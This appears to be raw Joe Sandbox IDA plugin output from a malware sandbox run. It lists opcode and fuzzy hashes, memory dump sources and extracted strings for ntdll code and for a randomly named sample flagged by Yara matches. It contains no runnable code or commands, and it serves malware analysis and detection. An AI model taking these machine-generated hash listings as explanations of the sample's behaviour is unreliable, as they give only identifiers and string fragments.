                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                                              • Instruction ID: 542fa46c1c09bdf752870486bb3e02cb083f04796fe813daf2275f8fc1d2d118
                                                                              • Opcode Fuzzy Hash: 5044baa6458567f490969b8cb3f2375990651eeeba64be22a72ab48167cbca10
                                                                              • Instruction Fuzzy Hash: 1F90022120944442D60076585408A074005D7D1205F55D025A20645B5DC735CA65A232
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                              • Instruction ID: 65921516359d62f8d5d3d0be205e1e26da0dc8636cbae108dd6a7fa2482c6dfb
                                                                              • Opcode Fuzzy Hash: 8eb2d77104a1e1af0b176298dacec9ef2cdf54e2e657e9d9900aaac880e5152b
                                                                              • Instruction Fuzzy Hash: 04900221246441525A45B25844045078006E7E1241795C026A2414970CC626DA6AD722
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                                              • Instruction ID: 8444e8c5c073f08537f5feee0e5ad5f02bc349f8d6c074850bdbcaa0278670ac
                                                                              • Opcode Fuzzy Hash: ea48599a799c62313db524f13018044e176bca0235e47b4c3979d6934356f8a2
                                                                              • Instruction Fuzzy Hash: 5990023124540402D641725844046074009E7D1241F95C026A1424574EC755CB6AAB62
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                                              • Instruction ID: 46c990dd8ed61010dd6670d268d27b14a518f24a921ec6edbfbf1a7cb9b8fd13
                                                                              • Opcode Fuzzy Hash: 74676fa8fa59c897a58c3357f5a7a2cee845890a9f2082f33bd2cd480c6430e1
                                                                              • Instruction Fuzzy Hash: 2490023120540842D60072584404B474005D7E1301F55C02AA1124674DC715CA657622
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                                              • Instruction ID: 517ad7e89975005f97a2a8a5e667bc5ea15cb1d4b5e75f3dc0b28dd1704168f0
                                                                              • Opcode Fuzzy Hash: dadb452b7e5ec38fa9adad0733ab50bfe2fa8edc6d11c3e46a49b33a7ff986c1
                                                                              • Instruction Fuzzy Hash: 7D90023120540403D600725855087074005D7D1201F55D425A1424578DD756CA656222
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                                              • Instruction ID: 79336149b241350bb2d54b870bdcfdbd48e0d8f5ee45252b92eba27cbca614a1
                                                                              • Opcode Fuzzy Hash: e5a4de0eed232571ca8cd1661b3c5d4e46d3ab1bc2e911a8a6b72b6cb8917b3d
                                                                              • Instruction Fuzzy Hash: A690022160940402D640725854187074015D7D1201F55D025A1024574DC759CB6967A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                                              • Instruction ID: fd27892a745314af67f8a0688a96114a181443fe2dba9f9ab1fcdc923572a964
                                                                              • Opcode Fuzzy Hash: 52b71c9fb453d14b68e60cfe2279b946216de792947187a16aa424d6e4bad3e9
                                                                              • Instruction Fuzzy Hash: D590023120540402D600769854086474005D7E1301F55D025A6024575EC765CAA56232
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                                              • Instruction ID: 2841014abdc4105725c73c00277c66941673532dd50bf5416d59aef19869d387
                                                                              • Opcode Fuzzy Hash: 9b72024da61fdfe1e398b3a837423e15873e725c18674b6fc1ab38c0e80a7351
                                                                              • Instruction Fuzzy Hash: 7090026121540042D604725844047074045D7E2201F55C026A3154574CC629CE755226
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                                              • Instruction ID: 6b7912cbe98c6291d18cdd3d23f79d03c31e2cce709b24ae8e4f3bd5564c3674
                                                                              • Opcode Fuzzy Hash: f8dcbc47ff78d25ac93dfaa5bc2c3405ae232fe74e054860ad89c2c471e4afcb
                                                                              • Instruction Fuzzy Hash: E690026134540442D60072584414B074005D7E2301F55C029E2064574DC719CE666227
                                                                              Memory Dump Source
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              Strings
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                                              • ExecuteOptions, xrefs: 018146A0
                                                                              • Execute=1, xrefs: 01814713
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$[$]:%u
                                                                              • API String ID: 48624451-2819853543
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                                              • RTL: Re-Waiting, xrefs: 0181031E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 01817B8E
                                                                              • RTL: Re-Waiting, xrefs: 01817BAC
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                              • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                                              • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                              • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                                              Strings
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                                              • RTL: Resource at %p, xrefs: 018172A3
                                                                              • RTL: Re-Waiting, xrefs: 018172C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                              • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                                              • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                              • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$]:%u
                                                                              • API String ID: 48624451-3050659472
                                                                              • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                              • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                                              • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                              • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                              • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                                              • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                              • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0
                                                                              APIs
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0182CFBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8
                                                                              • String ID: @$@4rw@4rw
                                                                              • API String ID: 4062629308-2979693914
                                                                              • Opcode ID: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                              • Instruction ID: 084a9f5174b8fc094d1b162a9402e10e031d6a62d059cca4c1b5fed9c858603a
                                                                              • Opcode Fuzzy Hash: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                              • Instruction Fuzzy Hash: E941B271900229DFCB229FA9C884AAEFBF8FF54740F14412AE915DB264D774DA41CB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: J$ $"m$(O$*$$3c$<b$A$I-$Py$Tx$\;$]w$_$b$j$k$m$t.$wY$x2$za$8$;$;$V
                                                                              • API String ID: 0-4272605677
                                                                              • Opcode ID: 9d8d3cb34f24184f142f96bf0105d3ead50fb511c11b83b60a7138656e1476db
                                                                              • Instruction ID: fbc308a492da78bb88023125b86decb7226918e4d9cae27ef70797ec6a11a171
                                                                              • Opcode Fuzzy Hash: 9d8d3cb34f24184f142f96bf0105d3ead50fb511c11b83b60a7138656e1476db
                                                                              • Instruction Fuzzy Hash: 46428CB0D05268CBEB64CF45C898BDDBBB2BB45309F1085DAC55E7B280CBB55AC98F44
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$O$S$\$s
                                                                              • API String ID: 0-3854637164
                                                                              • Opcode ID: 8e7d81f731b099927378a621b0ed022afee89c4086d5eae04d859a69e4457d9c
                                                                              • Instruction ID: 785409607038c4db920f85fa399f3b5bc1fdda2ceb2a836ee8e60abbb41bb94f
                                                                              • Opcode Fuzzy Hash: 8e7d81f731b099927378a621b0ed022afee89c4086d5eae04d859a69e4457d9c
                                                                              • Instruction Fuzzy Hash: 8651D572D00219AEDB14EF94DD88EFFF778EF84345F044299EE085B240E7755A488BA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >YZtP$>YZtP
                                                                              • API String ID: 0-3721418283
                                                                              • Opcode ID: 682a3ac950c724feed406ed87a0c7f418b235bfa9a2c715ed46b27c3ad916a36
                                                                              • Instruction ID: d44ae48c9d973713fa08c62ea6da8c0feacb5cff94033fe943e7ac7e76a975b1
                                                                              • Opcode Fuzzy Hash: 682a3ac950c724feed406ed87a0c7f418b235bfa9a2c715ed46b27c3ad916a36
                                                                              • Instruction Fuzzy Hash: E12121B6D0121CAF8B04DFA9D8409EFB7F9FF48210F14466AE915E7200E7709A018BE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: n
                                                                              • API String ID: 0-2391717367
                                                                              • Opcode ID: dc193c621a2e1d1a96cfdf3eb2f61ac882b32c2d26499a62e56599bbcd6270c9
                                                                              • Instruction ID: 178c644135ef01fed66d0fb90e28bb7f4a7559f804a1b80e51be06f75c8319ba
                                                                              • Opcode Fuzzy Hash: dc193c621a2e1d1a96cfdf3eb2f61ac882b32c2d26499a62e56599bbcd6270c9
                                                                              • Instruction Fuzzy Hash: FC2130B6D01219AF8B04DFA9D8419EFB7F9FF88200F10466AE915E7240E7709A04CBE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: C
                                                                              • API String ID: 0-3756324736
                                                                              • Opcode ID: 04c7f818f1937194e99df4efb491183e4e9414096e2ee5726e54c456acccd788
                                                                              • Instruction ID: 42dbebf8142a8f9f92ade5c2c5652bf650ac975f064e953b51ed95e7057bb63c
                                                                              • Opcode Fuzzy Hash: 04c7f818f1937194e99df4efb491183e4e9414096e2ee5726e54c456acccd788
                                                                              • Instruction Fuzzy Hash: F71100B6D0121CAFCB04DFA9D8419EEB7F9FF48210F14466EE915E7200E7705A048BA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8016e67c6e1c2fc9a5179110924fe79c0e53355a7c2c8bfa5bbbd3094af2250
                                                                              • Instruction ID: e71d8aceb6ce50501603ca1bab01729d10a6c5492d94250dcdfcebd35a718f7a
                                                                              • Opcode Fuzzy Hash: a8016e67c6e1c2fc9a5179110924fe79c0e53355a7c2c8bfa5bbbd3094af2250
                                                                              • Instruction Fuzzy Hash: 93115B75A00309AFD710EB94DC45FAF73BDFB89700F008549F9195B280E771A911CBA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 984fd0d33f7d43a1328f1b26a07d77cabaf74aca2c823024ef09e57d3afde007
                                                                              • Instruction ID: 04248c629e93c22b7f5da81fa5c3c7994b6c2a013d7fd870fc711d551e3de252
                                                                              • Opcode Fuzzy Hash: 984fd0d33f7d43a1328f1b26a07d77cabaf74aca2c823024ef09e57d3afde007
                                                                              • Instruction Fuzzy Hash: 2A112EB6D0121CAF8B00DFE9D8409EEB7F9FF88210F14456AE919E7200E7715A048FA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 32cd9665e4834db33bde06419df748375f444485a820c74ddfbafe29bab9e60f
                                                                              • Instruction ID: 47361317c410178bf80f0e1d54e81c159dec32616ada9251810e74005cb0c30d
                                                                              • Opcode Fuzzy Hash: 32cd9665e4834db33bde06419df748375f444485a820c74ddfbafe29bab9e60f
                                                                              • Instruction Fuzzy Hash: 0801C0BBA003256BD714EA64EC45DEF737CEF94210F000791FD589B290FA62AE514AE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7df841c2058dc2cf581955712555486a86eeb5ced268ae1b5a9dedb97608f522
                                                                              • Instruction ID: bbeacd1edd06cb35473e4f1a8bd5e6075b4e98be91cb0f7e23d5f7c31399fdc7
                                                                              • Opcode Fuzzy Hash: 7df841c2058dc2cf581955712555486a86eeb5ced268ae1b5a9dedb97608f522
                                                                              • Instruction Fuzzy Hash: 2E11B7B1D21329AF8B44CFADD98459EBFF8FB09A20B14865BE818E7200D77186518F95
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction ID: ee58d1d9ad0f4d53dae12e4c7ca1d14bb7c71705ae596e800614e0e0f58322e9
                                                                              • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction Fuzzy Hash: 3401C0B6201208BBCB44DF99DC91EDB77ADAF8C714F008108BA09E7241D630E951CBA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4acc6142ab94d67d5182f619eb6c412269dd0fc57ad3bf4917a1fe766b80ee13
                                                                              • Instruction ID: 73f340be0a28e1542da589ddcb977f65ff5fb443af9256bfd16b67ee363c149b
                                                                              • Opcode Fuzzy Hash: 4acc6142ab94d67d5182f619eb6c412269dd0fc57ad3bf4917a1fe766b80ee13
                                                                              • Instruction Fuzzy Hash: EB01DBB6C11218AF8B44DFE9D9409EEBBF9BB08200F14466EE915F7200E7705A048FE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 333a5d48edeb85a31d7c6c6c41d95b2f3f12195e9ca38012c29292d3dcf91a15
                                                                              • Instruction ID: 1a9f092f0810e77e7cd6d740b5eb8da66cd189c36945ec6538f1cf588f1629e6
                                                                              • Opcode Fuzzy Hash: 333a5d48edeb85a31d7c6c6c41d95b2f3f12195e9ca38012c29292d3dcf91a15
                                                                              • Instruction Fuzzy Hash: EDF082776142166BD7119E5DEC40B86F79CEB84235F250223F9188F241E672D85186A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cea48c64d28e3fbced6741d0c587e77cb87b497505e44cf4b77fd680a0492c35
                                                                              • Instruction ID: b73fa270dcce44b0dcacf8b731cccc657d396931b048f4fd29e059b72de63c4b
                                                                              • Opcode Fuzzy Hash: cea48c64d28e3fbced6741d0c587e77cb87b497505e44cf4b77fd680a0492c35
                                                                              • Instruction Fuzzy Hash: 19F0F675D01309BEEB10EFA0DC48EABB738EFC4609F0041C9E8096A190E5354A89C759
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
